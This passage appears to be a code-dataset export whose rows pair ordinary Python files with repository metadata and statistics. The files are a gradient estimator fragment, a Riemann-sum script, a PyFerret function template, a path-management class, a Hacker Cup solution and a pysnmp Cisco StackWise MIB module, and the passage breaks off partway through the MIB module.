theta.apply_fn(lambda x: ag.grad([c_phi_z], [x], retain_graph=True)[0]) dc_phi_zt = theta.apply_fn(lambda x: ag.grad([c_phi_zt], [x], retain_graph=True)[0]) g_relax = dlogp_dtheta * (self.f(b) - c_phi_zt) + dc_phi_z - dc_phi_zt var_estimate = (g_relax**2) phi_grad = phi.apply_fn(lambda x, y: ag.grad([y.sum()], [x], retain_graph=True)[0], var_estimate) gc.collect() return g_relax, phi_grad
29.89697
110
0.612204
707
4,933
4.055163
0.168317
0.059644
0.038368
0.034182
0.436693
0.346355
0.267178
0.218347
0.218347
0.169515
0
0.01546
0.252585
4,933
164
111
30.079268
0.762137
0
0
0.274194
0
0
0
0
0
0
0
0
0
1
0.217742
false
0
0.072581
0.072581
0.516129
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
0
0
1
0
0
2
00646f075a36206f708e4585f25c0a0bcf2de3e2
484
py
Python
Exercises/Riemann.py
JoeyDeSmet/Algorithm-intro
dd897c8ed33c6233450fe4fa3eacd474ede0aec1
[ "Apache-2.0" ]
null
null
null
Exercises/Riemann.py
JoeyDeSmet/Algorithm-intro
dd897c8ed33c6233450fe4fa3eacd474ede0aec1
[ "Apache-2.0" ]
null
null
null
Exercises/Riemann.py
JoeyDeSmet/Algorithm-intro
dd897c8ed33c6233450fe4fa3eacd474ede0aec1
[ "Apache-2.0" ]
1
2021-10-14T08:03:41.000Z
2021-10-14T08:03:41.000Z
import math def f(x): return math.pow(x, 2) + 3 * x + 15 def riemannIntegral(interval, a): x = interval[0] step = (interval[1] - interval[0]) / a x1 = x + step integral = 0 for i in range (interval[0], a): width = x1 - x height = f(x1) integral += width * height x = x1 x1 = x + step return integral print(riemannIntegral([0, 5], 5)) print(riemannIntegral([0, 5], 8)) print(riemannIntegral([0, 5], 1_000_000))
19.36
42
0.553719
71
484
3.746479
0.394366
0.101504
0.236842
0.24812
0
0
0
0
0
0
0
0.085799
0.301653
484
25
43
19.36
0.701183
0
0
0.111111
0
0
0
0
0
0
0
0
0
1
0.111111
false
0
0.055556
0.055556
0.277778
0.166667
0
0
0
null
0
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
2
0070e3db28342011ad26dad5be9905665020e271
3,282
py
Python
external_functions/pyef/template.py
josborne-noaa/PyFerret
8496508e9902c0184898522e9f89f6caea6d4539
[ "Unlicense" ]
44
2016-03-18T22:05:31.000Z
2021-12-23T01:50:09.000Z
external_functions/pyef/template.py
josborne-noaa/PyFerret
8496508e9902c0184898522e9f89f6caea6d4539
[ "Unlicense" ]
88
2016-08-19T08:05:37.000Z
2022-03-28T23:29:21.000Z
external_functions/pyef/template.py
josborne-noaa/PyFerret
8496508e9902c0184898522e9f89f6caea6d4539
[ "Unlicense" ]
24
2016-02-07T18:12:06.000Z
2022-02-19T09:06:17.000Z
''' Template for creating a PyFerret Python External Function (PyEF). The names of the functions provided should not be changed. By default, PyFerret uses the name of the module as the function name. Copy this file using a name that you would like to be the function name, then modify the contents of these functions and comments as desired. ''' import numpy def ferret_init(efid): ''' Initialization function for this PyFerret PyEF. Returns a dictionary describing the features of this PyFerret PyEF. At a minimum, assigns the number of arguments expected and a descriptions of the functions. May also provide descriptions of the arguments and specifications for a non-standard result grid. ''' init_dict = { } init_dict["numargs"] = 1 init_dict["descript"] = "Pass through" return init_dict def ferret_result_limits(efid): ''' Defines the index limits for all abstract axes in the result grid. Returns an (X,Y,Z,T,E,F)-axis six-tuple of either (low,high) pairs, for an abstract axis, or None, for a non-abstract axis. The low and high values are integer values. If the result grid has no abstract axes, this function will not be called and can be deleted. ''' axis_limits = (None, None, None, None, None, None) return axis_limits def ferret_custom_axes(efid): ''' Defines all custom axes in ther result grid. Returns a (X,Y,Z,T,E,F)- axis six-tuple of either a (low, high, delta, unit_name, is_modulo) tuple, for a custom axis, or None, for a non-custom axis. The low, high, and delta values are floating-point values in units of the axis coordinate ("world coordinates"). If the result grid has no custom axes, this function will not be called and can be deleted. ''' axis_info = (None, None, None, None, None, None) return axis_info def ferret_compute(efid, result, result_bdf, inputs, input_bdfs): ''' Computation function for this PyFerret PyEF. Assign values to the elements of result; do not reassign result itself. In other words, assign values using notation similar to 'result[...] = ...'; do not use notation similar to 'result = ...' as this will simply define a new local variable called result, hiding the variable passed into this function. If an error is detected, raise an appropriate exception. ValueError is commonly used for unexpected values. IndexError is commonly used for unexpected array sizes. Arguments: result - numpy float array to be assigned result_bdf - numpy read-only float array of one element giving the missing-data value to be used when assigning result inputs - tuple of numpy read-only float arrays giving the input values provided by the caller input_bdfs - numpy read-only float arrays of one element giving the missing-data value for the corresponding inputs array ''' # Create masks of values that are undefined and that are defined bad_mask = ( inputs[0] == input_bdfs[0] ) good_mask = numpy.logical_not(bad_mask) result[good_mask] = inputs[0][good_mask] result[bad_mask] = result_bdf return
37.724138
75
0.694089
488
3,282
4.608607
0.366803
0.035571
0.042686
0.042686
0.232992
0.163628
0.130725
0.130725
0.067586
0.067586
0
0.001611
0.243449
3,282
86
76
38.162791
0.904148
0.743754
0
0
0
0
0.041411
0
0
0
0
0
0
1
0.222222
false
0.055556
0.055556
0
0.5
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
1
0
0
0
0
0
2
008a94b66bc880792cadcf97f6f2be20449badcd
2,221
py
Python
src/ham/util/path_manager.py
n2qzshce/ham_radio_sync
ffe95a4ef88375b5d5e4503cf770e884644536cd
[ "CNRI-Python", "RSA-MD" ]
8
2021-03-01T17:28:45.000Z
2022-02-10T02:19:41.000Z
src/ham/util/path_manager.py
n2qzshce/ham_radio_sync
ffe95a4ef88375b5d5e4503cf770e884644536cd
[ "CNRI-Python", "RSA-MD" ]
7
2021-03-31T03:37:12.000Z
2021-06-12T20:30:05.000Z
src/ham/util/path_manager.py
n2qzshce/ham_radio_sync
ffe95a4ef88375b5d5e4503cf770e884644536cd
[ "CNRI-Python", "RSA-MD" ]
1
2021-02-24T21:39:51.000Z
2021-02-24T21:39:51.000Z
import os class PathManager: input_folder_label = None output_folder_label = None _input_folder_path = None _output_folder_path = None _import_file_path = None _import_file_style = None @classmethod def set_input_folder_label(cls, label): cls.input_folder_label = label @classmethod def set_output_folder_label(cls, label): cls.output_folder_label = label @classmethod def get_input_path(cls, file_name=None): result = cls._input_folder_path if file_name is not None: result = os.path.join(cls._input_folder_path, file_name) return result @classmethod def get_output_path(cls, file_name=None): result = cls._output_folder_path if file_name is not None: result = os.path.join(cls._output_folder_path, file_name) return result @classmethod def set_input_path(cls, path): cls._input_folder_path = os.path.abspath(path) if cls.input_folder_label is not None: cls.input_folder_label.text = f"Input folder: {cls._input_folder_path}" @classmethod def set_output_path(cls, path): cls._output_folder_path = os.path.abspath(path) if cls.output_folder_label is not None: cls.output_folder_label.text = f"Output folder: {cls._output_folder_path}" @classmethod def input_path_exists(cls, path=None): all_path = cls.get_input_path(path) return os.path.exists(all_path) @classmethod def output_path_exists(cls, path): all_path = cls.get_output_path(path) return os.path.exists(all_path) @classmethod def open_input_file(cls, file_name, mode): full_path = os.path.join(cls.get_input_path(), file_name) return cls._open_file(full_path, mode) @classmethod def open_output_file(cls, file_name, mode): full_path = os.path.join(cls.get_output_path(), file_name) return cls._open_file(full_path, mode) @classmethod def set_import_file(cls, file_name, style): full_path = os.path.abspath(file_name) cls._import_file_path = full_path cls._import_file_style = style @classmethod def get_import_path(cls): return cls._import_file_path @classmethod def get_import_style(cls): return cls._import_file_style @classmethod def _open_file(cls, file_name, mode): return open(f'{file_name}', f'{mode}', encoding='utf-8', newline='\n')
25.528736
77
0.767672
352
2,221
4.474432
0.105114
0.124444
0.062222
0.045714
0.512381
0.406349
0.377143
0.341587
0.245079
0.245079
0
0.000521
0.135975
2,221
86
78
25.825581
0.820219
0
0
0.333333
0
0
0.045925
0.022062
0
0
0
0
0
1
0.212121
false
0
0.151515
0.045455
0.606061
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
0
0
1
0
0
2
008cde908d293c007a270cb3365f701251d7f2a1
1,313
py
Python
2013/QualificationRound/problem1.py
radeinla/fbhackercup
11c30a77cac8c4fc542eba23d0b080cbb0f4ece9
[ "MIT" ]
null
null
null
2013/QualificationRound/problem1.py
radeinla/fbhackercup
11c30a77cac8c4fc542eba23d0b080cbb0f4ece9
[ "MIT" ]
null
null
null
2013/QualificationRound/problem1.py
radeinla/fbhackercup
11c30a77cac8c4fc542eba23d0b080cbb0f4ece9
[ "MIT" ]
null
null
null
def is_black(x): return x == '#' def is_square(box, N): size = None fbj1 = None fbj2 = None fbi1 = None fbi2 = None blank = "."*N for i in xrange(0, N): for j in xrange(0, N): if fbj1 is None or fbj2 is None: if is_black(box[i][j]): if fbj1 is None: fbj1 = j fbi1 = i elif j == N-1: fbj2 = j fbi2 = fbi1 + fbj2 - fbj1 else: if fbj1 is not None: fbj2 = j-1 fbi2 = fbi1 + fbj2 - fbj1 else: if is_black(box[i][j]): if (j < fbj1 or j > fbj2) or i - fbi1 > fbj2 - fbj1: return False else: if fbj1 <= j <= fbj2 and i - fbi1 <= fbj2 - fbj1: return False return fbj1 is not None with open("input1.txt") as f: T = int(f.readline()) for t in xrange(0, T): N = int(f.readline()) c = [] for i in xrange(0, N): c.append(f.readline().rstrip('\n')) print "Case #%d: %s" % (t+1, "YES" if is_square(c, N) else "NO")
28.543478
72
0.374714
164
1,313
2.969512
0.286585
0.065708
0.073922
0.061602
0.308008
0.308008
0.065708
0
0
0
0
0.061611
0.517898
1,313
45
73
29.177778
0.707741
0
0
0.275
0
0
0.023628
0
0
0
0
0
0
0
null
null
0
0
null
null
0.025
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
1
0
0
0
0
0
0
0
0
2
0094f3b130364ae0c13120be09b4683745e6005c
69,805
py
Python
pysnmp-with-texts/CISCO-STACKWISE-MIB.py
agustinhenze/mibs.snmplabs.com
1fc5c07860542b89212f4c8ab807057d9a9206c7
[ "Apache-2.0" ]
8
2019-05-09T17:04:00.000Z
2021-06-09T06:50:51.000Z
pysnmp-with-texts/CISCO-STACKWISE-MIB.py
agustinhenze/mibs.snmplabs.com
1fc5c07860542b89212f4c8ab807057d9a9206c7
[ "Apache-2.0" ]
4
2019-05-31T16:42:59.000Z
2020-01-31T21:57:17.000Z
pysnmp-with-texts/CISCO-STACKWISE-MIB.py
agustinhenze/mibs.snmplabs.com
1fc5c07860542b89212f4c8ab807057d9a9206c7
[ "Apache-2.0" ]
10
2019-04-30T05:51:36.000Z
2022-02-16T03:33:41.000Z
# # PySNMP MIB module CISCO-STACKWISE-MIB (http://snmplabs.com/pysmi) # ASN.1 source file:///Users/davwang4/Dev/mibs.snmplabs.com/asn1/CISCO-STACKWISE-MIB # Produced by pysmi-0.3.4 at Wed May 1 12:13:00 2019 # On host DAVWANG4-M-1475 platform Darwin version 18.5.0 by user davwang4 # Using Python version 3.7.3 (default, Mar 27 2019, 09:23:15) # ObjectIdentifier, OctetString, Integer = mibBuilder.importSymbols("ASN1", "ObjectIdentifier", "OctetString", "Integer") NamedValues, = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues") ValueRangeConstraint, ConstraintsUnion, SingleValueConstraint, ConstraintsIntersection, ValueSizeConstraint = mibBuilder.importSymbols("ASN1-REFINEMENT", "ValueRangeConstraint", "ConstraintsUnion", "SingleValueConstraint", "ConstraintsIntersection", "ValueSizeConstraint") ciscoMgmt, = mibBuilder.importSymbols("CISCO-SMI", "ciscoMgmt") EntPhysicalIndexOrZero, = mibBuilder.importSymbols("CISCO-TC", "EntPhysicalIndexOrZero") entPhysicalIndex, = mibBuilder.importSymbols("ENTITY-MIB", "entPhysicalIndex") ifIndex, = mibBuilder.importSymbols("IF-MIB", "ifIndex") SnmpAdminString, = mibBuilder.importSymbols("SNMP-FRAMEWORK-MIB", "SnmpAdminString") NotificationGroup, ObjectGroup, ModuleCompliance = mibBuilder.importSymbols("SNMPv2-CONF", "NotificationGroup", "ObjectGroup", "ModuleCompliance") NotificationType, Integer32, ObjectIdentity, TimeTicks, Counter32, MibIdentifier, Gauge32, MibScalar, MibTable, MibTableRow, MibTableColumn, iso, Bits, Counter64, ModuleIdentity, IpAddress, Unsigned32 = mibBuilder.importSymbols("SNMPv2-SMI", "NotificationType", "Integer32", "ObjectIdentity", "TimeTicks", "Counter32", "MibIdentifier", "Gauge32", "MibScalar", "MibTable", "MibTableRow", "MibTableColumn", "iso", "Bits", "Counter64", "ModuleIdentity", "IpAddress", "Unsigned32") DisplayString, TextualConvention, TruthValue, MacAddress = mibBuilder.importSymbols("SNMPv2-TC", "DisplayString", "TextualConvention", "TruthValue", "MacAddress") ciscoStackWiseMIB = ModuleIdentity((1, 3, 6, 1, 4, 1, 9, 9, 500)) ciscoStackWiseMIB.setRevisions(('2016-04-16 00:00', '2015-11-24 00:00', '2011-12-12 00:00', '2010-02-01 00:00', '2008-06-10 00:00', '2005-10-12 00:00',)) if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0): if mibBuilder.loadTexts: ciscoStackWiseMIB.setRevisionsDescriptions(('Added following objects in cswGlobals - cswStackDomainNum - cswStackType - cswStackBandWidth Created following tables - cswDistrStackLinkInfoTable -cswDistrStackPhyPortInfoTable Added cswStatusGroupRev2 Deprecated cswStatusGroupRev1 Added cswDistrStackLinkStatusGroup Added cswDistrStackPhyPortStatusGroup Added cswStackWiseMIBComplianceRev4 MIB COMPLIANCE Deprecated cswStackWiseMIBComplianceRev3 MIB COMPLIANCE.', 'Added following Objects in cswSwitchInfoTable - cswSwitchPowerAllocated Added following OBJECT-GROUP - cswStackPowerAllocatedGroup Deprecated cswStackWiseMIBComplianceRev2 MODULE-COMPLIANCE. Added cswStackWiseMIBComplianceRev3 MODULE-COMPLIANCE.', "Modified 'cswSwitchRole' object.", 'Added cswStackPowerStatusGroup, cswStackPowerSwitchStatusGroup, cswStackPowerPortStatusGroup, cswStatusGroupRev1 and cswStackPowerNotificationGroup. Deprecated cswStackWiseMIBCompliance compliance statement. Added cswStackWiseMIBComplianceRev1 compliance statement. Deprecated cswStatusGroup because we deprecated cswEnableStackNotifications', "Modified 'cswSwitchState' object.", 'Initial version of this MIB module.',)) if mibBuilder.loadTexts: ciscoStackWiseMIB.setLastUpdated('201604160000Z') if mibBuilder.loadTexts: ciscoStackWiseMIB.setOrganization('Cisco Systems, Inc.') if mibBuilder.loadTexts: ciscoStackWiseMIB.setContactInfo('Cisco Systems Customer Service Postal: 170 W Tasman Drive San Jose, CA 95134 Tel: +1 800 553-NETS E-mail: cs-dsbu@cisco.com') if mibBuilder.loadTexts: ciscoStackWiseMIB.setDescription('This MIB module contain a collection of managed objects that apply to network devices supporting the Cisco StackWise(TM) technology. The StackWise technology provides a method for collectively utilizing a stack of switches to create a single switching unit. The data stack is used for switching data packets and, in power stack, switches are connected by special stack power cables to share power. Moreover, stackwise is the concept for combining multiple systems to give an impression of a single system so that is why both power stack and data stack are supported by single MIB. Terminology: Stack - A collection of switches connected by the Cisco StackWise technology. Master - The switch that is managing the stack. Member - A switch in the stack that is NOT the stack master. Ring - Components that makes up the connections between the switches in order to create a stack. Stackport - A special physical connector used by the ring. It is possible for a switch have more than one stackport. SDM - Switch Database Management. Stack Power - A collection of switches connected by special stack power cables to share the power of inter-connected power supplies across all switches requiring power. Stack Power is managed by a single data stack. Jack-Jack - It is a device that provides the Power Shelf capabilities required for Stack Power on the high-end. POE - Power Over Ethernet FEP - Front End Power Supply SOC - Sustained Overload Condition GLS - Graceful Load Shedding ILS - Immediate Load Shedding SRLS - System Ring Load Shedding SSLS - System Star Load Shedding') class CswPowerStackMode(TextualConvention, Integer32): description = 'This textual convention is used to describe the mode of the power stack. Since the power stack could only run in either power sharing or redundant mode so this TC will also have only following valid values, powerSharing(1) :When a power stack is running in power sharing mode then all the power supplies in the power stack contributes towards the global power budget of the stack. redundant(2) :If the user wants the power stack to run in redundant mode then we will take the capacity of the largest power supply in the power stack out of power stack global power budget pool. powerSharingStrict(3):This mode is same as power sharing mode but, in this mode, the available power will always be more than the used power. redundantStrict(4) :This mode is same as redundant mode but, in this mode, the available power will always be more than the used power.' status = 'current' subtypeSpec = Integer32.subtypeSpec + ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4)) namedValues = NamedValues(("powerSharing", 1), ("redundant", 2), ("powerSharingStrict", 3), ("redundantStrict", 4)) class CswPowerStackType(TextualConvention, Integer32): description = 'This textual conventions is used to describe the type of the power stack. Since the power stack could only be configured in a ring or star topology so this TC will have only following valid values, ring(1): The power stack has been formed by connecting the switches in ring topology. star(2): The power stack has been formed by connecting the switches in star topology.' status = 'current' subtypeSpec = Integer32.subtypeSpec + ConstraintsUnion(SingleValueConstraint(1, 2)) namedValues = NamedValues(("ring", 1), ("star", 2)) ciscoStackWiseMIBNotifs = MibIdentifier((1, 3, 6, 1, 4, 1, 9, 9, 500, 0)) ciscoStackWiseMIBObjects = MibIdentifier((1, 3, 6, 1, 4, 1, 9, 9, 500, 1)) ciscoStackWiseMIBConform = MibIdentifier((1, 3, 6, 1, 4, 1, 9, 9, 500, 2)) cswGlobals = MibIdentifier((1, 3, 6, 1, 4, 1, 9, 9, 500, 1, 1)) cswStackInfo = MibIdentifier((1, 3, 6, 1, 4, 1, 9, 9, 500, 1, 2)) cswStackPowerInfo = MibIdentifier((1, 3, 6, 1, 4, 1, 9, 9, 500, 1, 3)) class CswSwitchNumber(TextualConvention, Unsigned32): description = 'A unique value, greater than zero, for each switch in a group of stackable switches.' status = 'current' displayHint = 'd' subtypeSpec = Unsigned32.subtypeSpec + ValueRangeConstraint(1, 4294967295) class CswSwitchNumberOrZero(TextualConvention, Unsigned32): description = 'A unique value, greater than or equal to zero, for each switch in a group of stackable switches. A value of zero means that the switch number can not be determined. The value of zero is not unique.' status = 'current' displayHint = 'd' subtypeSpec = Unsigned32.subtypeSpec + ValueRangeConstraint(0, 4294967295) class CswSwitchPriority(TextualConvention, Unsigned32): description = 'A value, greater than or equal to zero, that defines the priority of a switch in a group of stackable switches. The higher the value, the higher the priority.' status = 'current' displayHint = 'd' subtypeSpec = Unsigned32.subtypeSpec + ValueRangeConstraint(0, 4294967295) cswMaxSwitchNum = MibScalar((1, 3, 6, 1, 4, 1, 9, 9, 500, 1, 1, 1), CswSwitchNumber()).setMaxAccess("readonly") if mibBuilder.loadTexts: cswMaxSwitchNum.setStatus('current') if mibBuilder.loadTexts: cswMaxSwitchNum.setDescription('The maximum number of switches that can be configured on this stack. This is also the maximum value that can be set by the cswSwitchNumNextReload object.') cswMaxSwitchConfigPriority = MibScalar((1, 3, 6, 1, 4, 1, 9, 9, 500, 1, 1, 2), CswSwitchPriority()).setMaxAccess("readonly") if mibBuilder.loadTexts: cswMaxSwitchConfigPriority.setStatus('current') if mibBuilder.loadTexts: cswMaxSwitchConfigPriority.setDescription('The maximum configurable priority for a switch in this stack. Highest value equals highest priority. This is the highest value that can be set by the cswSwitchSwPriority object.') cswRingRedundant = MibScalar((1, 3, 6, 1, 4, 1, 9, 9, 500, 1, 1, 3), TruthValue()).setMaxAccess("readonly") if mibBuilder.loadTexts: cswRingRedundant.setStatus('current') if mibBuilder.loadTexts: cswRingRedundant.setDescription("A value of 'true' is returned when the stackports are connected in such a way that it forms a redundant ring.") cswStackPowerInfoTable = MibTable((1, 3, 6, 1, 4, 1, 9, 9, 500, 1, 3, 1), ) if mibBuilder.loadTexts: cswStackPowerInfoTable.setStatus('current') if mibBuilder.loadTexts: cswStackPowerInfoTable.setDescription('This table holds the information about all the power stacks in a single data stack.') cswStackPowerInfoEntry = MibTableRow((1, 3, 6, 1, 4, 1, 9, 9, 500, 1, 3, 1, 1), ).setIndexNames((0, "CISCO-STACKWISE-MIB", "cswStackPowerStackNumber")) if mibBuilder.loadTexts: cswStackPowerInfoEntry.setStatus('current') if mibBuilder.loadTexts: cswStackPowerInfoEntry.setDescription('An entry in the cswStackPowerInfoTable for each of the power stacks in a single data stack. This entry contains information regarding the power stack.') cswStackPowerStackNumber = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 500, 1, 3, 1, 1, 1), Unsigned32()) if mibBuilder.loadTexts: cswStackPowerStackNumber.setStatus('current') if mibBuilder.loadTexts: cswStackPowerStackNumber.setDescription('A unique value, greater than zero, to identify a power stack.') cswStackPowerMode = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 500, 1, 3, 1, 1, 2), CswPowerStackMode()).setMaxAccess("readwrite") if mibBuilder.loadTexts: cswStackPowerMode.setStatus('current') if mibBuilder.loadTexts: cswStackPowerMode.setDescription('This object specifies the information about the mode of the power stack. Power-sharing mode: All of the input power can be used for loads, and the total available power appears as one huge power supply. The power budget includes all power from all supplies. No power is set aside for power supply failures, so if a power supply fails, load shedding (shutting down of powered devices or switches) might occur. This is the default. Redundant mode: The largest power supply is removed from the power pool to be used as backup power in case one of the other power supplies fails. The available power budget is the total power minus the largest power supply. This reduces the available power in the pool for switches and powered devices to draw from, but in case of a failure or an extreme power load, there is less chance of having to shut down switches or powered devices. This is the recommended operating mode if your system has enough power. In addition, you can configure each mode to run a strict power budget or a non-strict (loose) power budget. If the mode is strict, the stack power needs cannot exceed the available power. When the power budgeted to devices reaches the maximum available PoE power, power is denied to the next device seeking power. In this mode the stack never goes into an over-budgeted power mode. When the mode is non-strict, budgeted power is allowed to exceed available power. This is normally not a problem because most devices do not run at full power and the chances of all powered devices in the stack requiring maximum power at the same time is small.') cswStackPowerMasterMacAddress = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 500, 1, 3, 1, 1, 3), MacAddress()).setMaxAccess("readonly") if mibBuilder.loadTexts: cswStackPowerMasterMacAddress.setStatus('current') if mibBuilder.loadTexts: cswStackPowerMasterMacAddress.setDescription('This object indicates the Mac address of the power stack master.') cswStackPowerMasterSwitchNum = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 500, 1, 3, 1, 1, 4), Unsigned32()).setMaxAccess("readonly") if mibBuilder.loadTexts: cswStackPowerMasterSwitchNum.setStatus('current') if mibBuilder.loadTexts: cswStackPowerMasterSwitchNum.setDescription('This object indicates the switch number of the power stack master. The value of this object would be zero if the power stack master is not part of this data stack.') cswStackPowerNumMembers = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 500, 1, 3, 1, 1, 5), Unsigned32()).setMaxAccess("readonly") if mibBuilder.loadTexts: cswStackPowerNumMembers.setStatus('current') if mibBuilder.loadTexts: cswStackPowerNumMembers.setDescription('This object indicates the number of members in the power stack.') cswStackPowerType = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 500, 1, 3, 1, 1, 6), CswPowerStackType()).setMaxAccess("readonly") if mibBuilder.loadTexts: cswStackPowerType.setStatus('current') if mibBuilder.loadTexts: cswStackPowerType.setDescription('This object indicates the topology of the power stack, that is, whether the switch is running in RING or STAR topology.') cswStackPowerName = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 500, 1, 3, 1, 1, 7), SnmpAdminString()).setMaxAccess("readwrite") if mibBuilder.loadTexts: cswStackPowerName.setStatus('current') if mibBuilder.loadTexts: cswStackPowerName.setDescription('This object specifies a unique name of this power stack. A zero-length string indicates no name is assigned.') cswStackPowerPortInfoTable = MibTable((1, 3, 6, 1, 4, 1, 9, 9, 500, 1, 3, 2), ) if mibBuilder.loadTexts: cswStackPowerPortInfoTable.setStatus('current') if mibBuilder.loadTexts: cswStackPowerPortInfoTable.setDescription('This table contains information about the stack power ports. There exists an entry in this table for each physical stack power port.') cswStackPowerPortInfoEntry = MibTableRow((1, 3, 6, 1, 4, 1, 9, 9, 500, 1, 3, 2, 1), ).setIndexNames((0, "ENTITY-MIB", "entPhysicalIndex"), (0, "CISCO-STACKWISE-MIB", "cswStackPowerPortIndex")) if mibBuilder.loadTexts: cswStackPowerPortInfoEntry.setStatus('current') if mibBuilder.loadTexts: cswStackPowerPortInfoEntry.setDescription('A conceptual row in the cswStackPowerPortInfoTable. This entry contains information about a power stack port.') cswStackPowerPortIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 500, 1, 3, 2, 1, 1), Unsigned32()) if mibBuilder.loadTexts: cswStackPowerPortIndex.setStatus('current') if mibBuilder.loadTexts: cswStackPowerPortIndex.setDescription('A unique value, greater than zero, for each stack power port.') cswStackPowerPortOperStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 500, 1, 3, 2, 1, 2), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("enabled", 1), ("disabled", 2)))).setMaxAccess("readwrite") if mibBuilder.loadTexts: cswStackPowerPortOperStatus.setStatus('current') if mibBuilder.loadTexts: cswStackPowerPortOperStatus.setDescription('This object is used to either set or unset the operational status of the stack port. This object will have following valid values, enabled(1) : The port is enabled disabled(2) : The port is forced down') cswStackPowerPortNeighborMacAddress = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 500, 1, 3, 2, 1, 3), MacAddress()).setMaxAccess("readonly") if mibBuilder.loadTexts: cswStackPowerPortNeighborMacAddress.setStatus('current') if mibBuilder.loadTexts: cswStackPowerPortNeighborMacAddress.setDescription("This objects indicates the port neighbor's Mac Address.") cswStackPowerPortNeighborSwitchNum = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 500, 1, 3, 2, 1, 4), CswSwitchNumberOrZero()).setMaxAccess("readonly") if mibBuilder.loadTexts: cswStackPowerPortNeighborSwitchNum.setStatus('current') if mibBuilder.loadTexts: cswStackPowerPortNeighborSwitchNum.setDescription("This objects indicates the port neighbor's switch number. If either there is no switch connected or the neighbor is not Jack-Jack then the value of this object is going to be 0.") cswStackPowerPortLinkStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 500, 1, 3, 2, 1, 5), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("up", 1), ("down", 2)))).setMaxAccess("readonly") if mibBuilder.loadTexts: cswStackPowerPortLinkStatus.setStatus('current') if mibBuilder.loadTexts: cswStackPowerPortLinkStatus.setDescription('This object is used to describe the link status of the stack port. This object will have following valid values, up(1) : The port is connected and operational down(2): The port is either forced down or not connected') cswStackPowerPortOverCurrentThreshold = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 500, 1, 3, 2, 1, 6), Unsigned32()).setUnits('Amperes').setMaxAccess("readwrite") if mibBuilder.loadTexts: cswStackPowerPortOverCurrentThreshold.setStatus('current') if mibBuilder.loadTexts: cswStackPowerPortOverCurrentThreshold.setDescription('This object is used to retrieve the over current threshold. The stack power cables are limited to carry current up to the limit retrieved by this object. The stack power cables would not be able to function properly if either the input or output current goes beyond the threshold retrieved by this object.') cswStackPowerPortName = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 500, 1, 3, 2, 1, 7), SnmpAdminString()).setMaxAccess("readonly") if mibBuilder.loadTexts: cswStackPowerPortName.setStatus('current') if mibBuilder.loadTexts: cswStackPowerPortName.setDescription('This object specifies a unique name of the stack power port as shown on the face plate of the system. A zero-length string indicates no name is assigned.') cswEnableStackNotifications = MibScalar((1, 3, 6, 1, 4, 1, 9, 9, 500, 1, 1, 4), TruthValue()).setMaxAccess("readwrite") if mibBuilder.loadTexts: cswEnableStackNotifications.setStatus('deprecated') if mibBuilder.loadTexts: cswEnableStackNotifications.setDescription("This object indicates whether the system generates the notifications defined in this MIB or not. A value of 'false' will prevent the notifications from being sent.") cswEnableIndividualStackNotifications = MibScalar((1, 3, 6, 1, 4, 1, 9, 9, 500, 1, 1, 5), Bits().clone(namedValues=NamedValues(("stackPortChange", 0), ("stackNewMaster", 1), ("stackMismatch", 2), ("stackRingRedundant", 3), ("stackNewMember", 4), ("stackMemberRemoved", 5), ("stackPowerLinkStatusChanged", 6), ("stackPowerPortOperStatusChanged", 7), ("stackPowerVersionMismatch", 8), ("stackPowerInvalidTopology", 9), ("stackPowerBudgetWarning", 10), ("stackPowerInvalidInputCurrent", 11), ("stackPowerInvalidOutputCurrent", 12), ("stackPowerUnderBudget", 13), ("stackPowerUnbalancedPowerSupplies", 14), ("stackPowerInsufficientPower", 15), ("stackPowerPriorityConflict", 16), ("stackPowerUnderVoltage", 17), ("stackPowerGLS", 18), ("stackPowerILS", 19), ("stackPowerSRLS", 20), ("stackPowerSSLS", 21), ("stackMemberToBeReloadedForUpgrade", 22)))).setMaxAccess("readwrite") if mibBuilder.loadTexts: cswEnableIndividualStackNotifications.setStatus('current') if mibBuilder.loadTexts: cswEnableIndividualStackNotifications.setDescription('This object is used to enable/disable individual notifications defined in this MIB module. Turning on a particular bit would enable the corresponding trap and, similarly, turning off a particular bit would disable the corresponding trap. The following notifications are controlled by this object: stackPortChange(0): enables/disables cswStackPortChange notification. stackNewMaster(1): enables/disables cswStackNewMember notification. stackMismatch(2): enables/disables cswStackMismatch notification. stackRingRedundant(3): enables/disables cswStackRingRedundant notification. stackNewMember(4): enables/disables cswStackNewMember notification. stackMemberRemoved(5): enables/disables cswStackMemberRemoved notification. stackPowerLinkStatusChanged(6): enables/disables cswStackPowerPortLinkStatusChanged notification. stackPowerPortOperStatusChanged(7): enables/disables cswStackPowerPortOperStatusChanged notification. stackPowerVersionMismatch(8): enables/disables cswStackPowerVersionMismatch notification. stackPowerInvalidTopology(9): enables/disables 